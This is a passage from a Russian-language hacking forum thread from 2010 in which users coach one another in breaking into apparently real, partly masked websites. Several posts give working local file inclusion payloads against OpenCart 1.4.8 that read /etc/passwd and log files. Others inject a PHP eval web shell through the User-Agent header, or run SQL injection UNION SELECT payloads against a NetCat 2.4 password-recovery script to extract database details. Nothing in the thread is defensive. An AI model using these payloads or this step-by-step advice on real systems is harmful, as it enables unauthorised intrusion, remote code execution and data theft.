Старый 11.07.2010, 23:34   #41
avenu
 
Аватар для avenu
 
Регистрация: 10.07.2010
Сообщений: 36
Репутация: 13
По умолчанию

2 Xenu
мб есть смысл поискать и глянуть httpd.conf ?
__________________
С утра и навсегда
avenu вне форума   Ответить с цитированием
Старый 12.07.2010, 00:03   #42
Xenu
 
Регистрация: 05.07.2010
Сообщений: 6
Репутация: 0
По умолчанию

Цитата:
Сообщение от avenu Посмотреть сообщение
2 Xenu
мб есть смысл поискать и глянуть httpd.conf ?
Он был первым в списке разыскиваемых )
Xenu вне форума   Ответить с цитированием
Старый 12.07.2010, 00:11   #43
POS_troi
 
Аватар для POS_troi
 
Регистрация: 06.07.2010
Сообщений: 98
Репутация: 35
По умолчанию

Поищи в каталогах файл error.log
POS_troi вне форума   Ответить с цитированием
Старый 12.07.2010, 22:28   #44
525
 
Регистрация: 06.07.2010
Сообщений: 34
Репутация: 0
По умолчанию

%Нужная помощь ) Есть сайт на bitrix site.com, на в отдельных папке стоит Opencart 1.4.8 site.com/opencart, как известно в Opencart 1.4.8 есть LFI site.com/opencart/index.php?route=../../../../../../../etc/passwd%00 Как проинкулиди ? мб в битрикс или опен карт можно как-то залить картинку, входы в систему пользователя непрацюють то есть авторизоваться нелзя ..
site.com/opencart/index.php?route=../../../../../../../proc/self/environ%00 -- нет ничего не выводит
site.com/opencart/index.php?route=../../../../../../../proc/self/status%00 -- єсть PPid:11930
http://site.com/index.php?page=../.....cmd=phpinfo();
-H User-Agent: <?php eval(\$_GET[cmd]); ?>%00 -- ніхрена
http://site.com/index.php?page=../.....cmd=phpinfo();
-H User-Agent: <?php eval(\$_GET[cmd]); ?>%00 --- ніхрена
site.com/opencart/index.php?route=../../../../../../../var/log/apache2/error.log%00 -- єсть
site.com/opencart/index.php?route=../../../../../../../var/log/apache2/access.log%00 --- нема
что можно сделать ? надеюсь на вашу помощь
525 вне форума   Ответить с цитированием
Старый 13.07.2010, 11:07   #45
it's my
 
Регистрация: 06.07.2010
Сообщений: 39
Репутация: 11
По умолчанию

Цитата:
Сообщение от 525 Посмотреть сообщение
%Нужная помощь ) Есть сайт на bitrix site.com, на в отдельных папке стоит Opencart 1.4.8 site.com/opencart, как известно в Opencart 1.4.8 есть LFI site.com/opencart/index.php?route=../../../../../../../etc/passwd%00 Как проинкулиди ? мб в битрикс или опен карт можно как-то залить картинку, входы в систему пользователя непрацюють то есть авторизоваться нелзя ..
site.com/opencart/index.php?route=../../../../../../../proc/self/environ%00 -- нет ничего не выводит
site.com/opencart/index.php?route=../../../../../../../proc/self/status%00 -- єсть PPid:11930
http://site.com/index.php?page=../.....cmd=phpinfo();
-H User-Agent: <?php eval(\$_GET[cmd]); ?>%00 -- ніхрена
http://site.com/index.php?page=../.....cmd=phpinfo();
-H User-Agent: <?php eval(\$_GET[cmd]); ?>%00 --- ніхрена
site.com/opencart/index.php?route=../../../../../../../var/log/apache2/error.log%00 -- єсть
site.com/opencart/index.php?route=../../../../../../../var/log/apache2/access.log%00 --- нема
что можно сделать ? надеюсь на вашу помощь
ну во первых тут:
Код:
 site.com/opencart/index.php?route=../../../../../../../proc/self/status%00   -- єсть  PPid:11930
нужно узнать Pid, а во вторых тут:
Код:
http://site.com/index.php?page=../../../../../../..proc/11930/fd/2&cmd=phpinfo();
если ты обрезаешь расширение нуллбайтом, то как бэ и это тоже не исключение, где он? нужно найти логи, в которых ты четко увидишь что записан твой ЮЗЕР_АГЕНТ, и причем fd/2 может быть как и fd/7 (часто попадающие) так и другими цифрами цифровита, и если уж ты нашел логи, то отправлять надо вместо или добавив к ЮЗЕР_АГЕНТУ вот это <?php eval($_GET[cmd]); ?> но зачем ты там ставишь нулбайт, непонятно.

дальше, если ты нашел error.log то так же смотри что там логируется, елси так же пишется твой какой-нибудь ЮЗЕР_АГЕНТ, то вместо него и отправляй пхп-код. Если ничего не сработает. То попробуй найти файлы сессий и проинклюдить их... а вообще включи фантазию
it's my вне форума   Ответить с цитированием
Старый 13.07.2010, 13:09   #46
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

помогите раскрутить _***.ru/netcat/modules/auth/password_recovery.php?ucc=123&uid=1'%20or%201='1 утомился я ужо, идеи закончились

_***.ru/netcat/admin
=>
_http://***.ru:1288/netcat/admin/
=>
NetCat 2.4 Extra

phpinfo: _http://***.ru/phpinfo.php

уязвимый код (судя по доступным нуледным исходникам):
PHP код:
if (isset($_GET['uid']) && isset($_GET['ucc']))
{
  
$q $db->get_var("SELECT RegistrationCode FROM User WHERE User_ID = '{$_GET['uid']}' LIMIT 1"); 
единственное, чего получилось добиться это это:
GET http://***.ru:80/netcat/modules/auth/password_recovery.php?ucc=123&uid=1'%20or%201='1 HTTP/1.1
=>
Unknown column '20or' in 'where clause'
=> где-то всунули жесткую фильтрацию

Последний раз редактировалось Twost; 14.05.2013 в 11:42..
DrakonHaSh вне форума   Ответить с цитированием
Старый 13.07.2010, 13:29   #47
wildshaman
 
Аватар для wildshaman
 
Регистрация: 05.07.2010
Сообщений: 29
Репутация: 10
По умолчанию

Код:
http://***.ru/netcat/modules/auth/password_recovery.php?ucc=123&uid=1'/**/union/**/select/**/1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12/*
__________________
Cool story, bro

http://imgur.com/7I5sJ.jpg

Последний раз редактировалось Twost; 14.05.2013 в 11:43..
wildshaman вне форума   Ответить с цитированием
Старый 13.07.2010, 13:37   #48
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

DrakonHaSh
***.ru/netcat/modules/auth/password_recovery.php?ucc=123&uid=(1)'union(select '1',2,3,4,5,6,7,version(),9,10,11,12)/*

вот тут я собрал все фишки, просто не юзай пробелы:
https://rdot.org/forum/showthread.php?t=60

//add
ХМ, даже не посмотрел, что там всё проще, думал и правда жёско
wildshaman опередил

Последний раз редактировалось Twost; 14.05.2013 в 11:43..
Jokester вне форума   Ответить с цитированием
Старый 13.07.2010, 14:37   #49
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

wildshaman, Jokester спасибо. а я что-то затупил похоже бывает
кста, "прикол" заметил - в моем ff эти запросы не прокатывают, т.к. он ' заменяет на %27, в старичке ослике все ок
DrakonHaSh вне форума   Ответить с цитированием
Старый 13.07.2010, 15:26   #50
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

Цитата:
Сообщение от DrakonHaSh Посмотреть сообщение
кста, "прикол" заметил - в моем ff эти запросы не прокатывают, т.к. он ' заменяет на %27, в старичке ослике все ок
Это не "прикол", а косяк. Третья ветка лисы для хека не катит. Поднимали эту тему уже
Jokester вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot